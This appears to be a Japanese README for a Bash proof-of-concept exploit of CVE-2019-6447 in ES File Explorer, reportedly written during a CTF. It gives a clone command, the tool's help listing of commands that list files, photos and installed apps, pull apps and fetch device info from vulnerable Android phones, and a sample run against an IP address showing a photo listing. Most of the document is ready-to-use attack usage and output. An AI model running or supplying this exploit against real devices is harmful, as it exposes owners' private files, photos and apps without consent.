
ES File ExplorerのCVE-2019-6447を悪用するBash PoCスクリプトで、脆弱なAndroidデバイスからファイル、写真、ビデオ、アプリを一覧表示し、ファイルをダウンロードします。

これは、CVE-2019-6447 の PoC の bash による非常にシンプルな実装です。基本的に curl を使用して適切なパラメータでリクエストを送信します。CTF 中に同様のスクリプトを探していたのですが見つからなかったため、作成しました。元のスクリプトを自由に変更して、お好みに合わせてカスタマイズできます。
リポジトリをクローンして、.sh ファイルを使用するだけです。
git clone [email protected]:julio-cfa/POC-ES-File-Explorer-CVE-2019-6447.git
または、raw コンテンツをコピーしてファイルに貼り付けます。
kyoto :: ~ % ./ESExplorerExploit.sh -h
--- これは ES File Explorer CVE-2019-6447 の非常にシンプルな PoC です ---
次のコマンドを試せます:
listFiles すべてのファイルを一覧表示
listPics すべての画像を一覧表示
listVideos すべての動画を一覧表示
listAudios すべての音声を一覧表示
listApps インストールされているすべてのアプリケーションを一覧表示
listAppsSystem システムアプリを一覧表示
listAppsPhone 通信関連アプリケーションを一覧表示
listAppsSdcard SDカードにインストールされているアプリを一覧表示
listAppsAll すべてのアプリケーションを一覧表示
getAppThumbnail 指定されたアプリケーションのアイコンを一覧表示
appLaunch 開発されたアプリケーションを起動
appPull デバイスからアプリケーションをダウンロード
getDeviceInfo システム情報を取得
使用例: ./ESExplorerExploit.sh 10.10.10.247 sdcard listFiles
kyoto :: ~ % ./ESExplorerExploit.sh 10.10.10.247 sdcard/DCIM listFiles
[
{"name":"example1.jpg", "time":"4/21/21 02:38:08 AM", "type":"file", "size":"135.33 KB (138,573 Bytes)", },
{"name":"example2.png", "time":"4/21/21 02:37:50 AM", "type":"file", "size":"6.24 KB (6,392 Bytes)", },
{"name":"example3.jpg", "time":"4/21/21 02:38:18 AM", "type":"file", "size":"1.14 MB (1,200,401 Bytes)", },
{"name":"example4.png", "time":"4/21/21 02:37:21 AM", "type":"file", "size":"124.88 KB (127,876 Bytes)", }
]
このエクスプロイトが内部でどのように動作するのか気になる場合、または失敗して独自のスクリプトを作成する必要がある場合は、以下のリンクを参照してください:
https://packetstormsecurity.com/files/163303/ES-File-Explorer-4.1.9.7.4-Arbitrary-File-Read.html
https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
https://www.safe.security/assets/img/research-paper/pdf/es-file-explorer-vulnerability.pdf
https://medium.com/@knownsec404team/analysis-of-es-file-explorer-security-vulnerability-cve-2019-6447-7f34407ed566